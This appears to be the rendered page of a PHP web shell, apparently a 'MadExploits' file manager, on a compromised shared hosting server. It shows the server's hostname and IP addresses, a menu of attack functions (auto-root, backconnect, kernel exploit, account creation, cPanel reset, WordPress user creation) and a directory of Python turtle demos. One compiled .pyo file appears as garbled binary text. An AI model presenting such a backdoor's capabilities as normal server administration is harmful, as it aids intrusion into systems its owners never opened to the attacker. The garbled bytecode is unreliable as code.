Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
lib64 /
python2.7 /
Demo /
turtle /
[ HOME SHELL ]
Name
Size
Permission
Action
about_turtle.txt
3.44
KB
-rw-r--r--
about_turtledemo.txt
302
B
-rw-r--r--
demohelp.txt
2.96
KB
-rw-r--r--
tdemo_I_dontlike_tiltdemo.py
1.05
KB
-rwxr-xr-x
tdemo_I_dontlike_tiltdemo.pyc
1.62
KB
-rw-r--r--
tdemo_I_dontlike_tiltdemo.pyo
1.62
KB
-rw-r--r--
tdemo_bytedesign.py
4.12
KB
-rwxr-xr-x
tdemo_bytedesign.pyc
5.19
KB
-rw-r--r--
tdemo_bytedesign.pyo
5.19
KB
-rw-r--r--
tdemo_chaos.py
951
B
-rw-r--r--
tdemo_chaos.pyc
2.24
KB
-rw-r--r--
tdemo_chaos.pyo
2.24
KB
-rw-r--r--
tdemo_clock.py
3.14
KB
-rwxr-xr-x
tdemo_clock.pyc
4.43
KB
-rw-r--r--
tdemo_clock.pyo
4.43
KB
-rw-r--r--
tdemo_colormixer.py
1.31
KB
-rw-r--r--
tdemo_colormixer.pyc
2.31
KB
-rw-r--r--
tdemo_colormixer.pyo
2.31
KB
-rw-r--r--
tdemo_fractalcurves.py
3.33
KB
-rwxr-xr-x
tdemo_fractalcurves.pyc
3.44
KB
-rw-r--r--
tdemo_fractalcurves.pyo
3.44
KB
-rw-r--r--
tdemo_lindenmayer_indian.py
2.38
KB
-rwxr-xr-x
tdemo_lindenmayer_indian.pyc
3.52
KB
-rw-r--r--
tdemo_lindenmayer_indian.pyo
3.52
KB
-rw-r--r--
tdemo_minimal_hanoi.py
2
KB
-rwxr-xr-x
tdemo_minimal_hanoi.pyc
3.54
KB
-rw-r--r--
tdemo_minimal_hanoi.pyo
3.54
KB
-rw-r--r--
tdemo_nim.py
6.36
KB
-rw-r--r--
tdemo_nim.pyc
9.16
KB
-rw-r--r--
tdemo_nim.pyo
9.16
KB
-rw-r--r--
tdemo_paint.py
1.26
KB
-rwxr-xr-x
tdemo_paint.pyc
1.86
KB
-rw-r--r--
tdemo_paint.pyo
1.86
KB
-rw-r--r--
tdemo_peace.py
1.04
KB
-rwxr-xr-x
tdemo_peace.pyc
1.36
KB
-rw-r--r--
tdemo_peace.pyo
1.36
KB
-rw-r--r--
tdemo_penrose.py
3.45
KB
-rwxr-xr-x
tdemo_penrose.pyc
5.86
KB
-rw-r--r--
tdemo_penrose.pyo
5.86
KB
-rw-r--r--
tdemo_planet_and_moon.py
2.76
KB
-rwxr-xr-x
tdemo_planet_and_moon.pyc
4.43
KB
-rw-r--r--
tdemo_planet_and_moon.pyo
4.43
KB
-rw-r--r--
tdemo_tree.py
1.38
KB
-rwxr-xr-x
tdemo_tree.pyc
2.07
KB
-rw-r--r--
tdemo_tree.pyo
2.07
KB
-rw-r--r--
tdemo_two_canvases.py
1.09
KB
-rw-r--r--
tdemo_two_canvases.pyc
1.6
KB
-rw-r--r--
tdemo_two_canvases.pyo
1.6
KB
-rw-r--r--
tdemo_wikipedia.py
1.32
KB
-rw-r--r--
tdemo_wikipedia.pyc
1.91
KB
-rw-r--r--
tdemo_wikipedia.pyo
1.91
KB
-rw-r--r--
tdemo_yinyang.py
807
B
-rwxr-xr-x
tdemo_yinyang.pyc
1.29
KB
-rw-r--r--
tdemo_yinyang.pyo
1.29
KB
-rw-r--r--
turtle.cfg
160
B
-rw-r--r--
turtleDemo.py
9.85
KB
-rwxr-xr-x
turtleDemo.pyc
10.69
KB
-rw-r--r--
turtleDemo.pyo
10.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tdemo_paint.pyo
� Afc @ s_ d Z d d l Td d d � Z d d d � Z d � Z e d k r[ e � Z e GHe � n d S( sp turtle-example-suite: tdemo_paint.py A simple event-driven paint program - left mouse button moves turtle - middle mouse button changes color - right mouse button toogles betweem pen up (no line drawn when the turtle moves) and pen down (line is drawn). If pen up follows at least two pen-down moves, the polygon that includes the starting point is filled. ------------------------------------------- Play around by clicking into the canvas using all three mouse buttons. ------------------------------------------- To exit press STOP button ------------------------------------------- i����( t *i c C s0 t � d r t � t � n t � t � d S( Nt pendown( t pent end_fillt upt downt begin_fill( t xt y( ( s/ /usr/lib64/python2.7/Demo/turtle/tdemo_paint.pyt switchupdown s c C s$ t d t d a t t d � d S( Ni i ( t colorst color( R R ( ( s/ /usr/lib64/python2.7/Demo/turtle/tdemo_paint.pyt changecolor s c C sz t d � t d � t d � t d � d d d d g a t t d � t � t t d � t t d � t t d � d S( Nt circlet userg �?i t redt greent bluet yellowi i i t EVENTLOOP( t shapet resizemodet shapesizet widthR R R t onscreenclickt gotoR ( ( ( s/ /usr/lib64/python2.7/Demo/turtle/tdemo_paint.pyt main% s t __main__N( t __doc__t turtleR R R t __name__t msgt mainloop( ( ( s/ /usr/lib64/python2.7/Demo/turtle/tdemo_paint.pyt <module> s
Close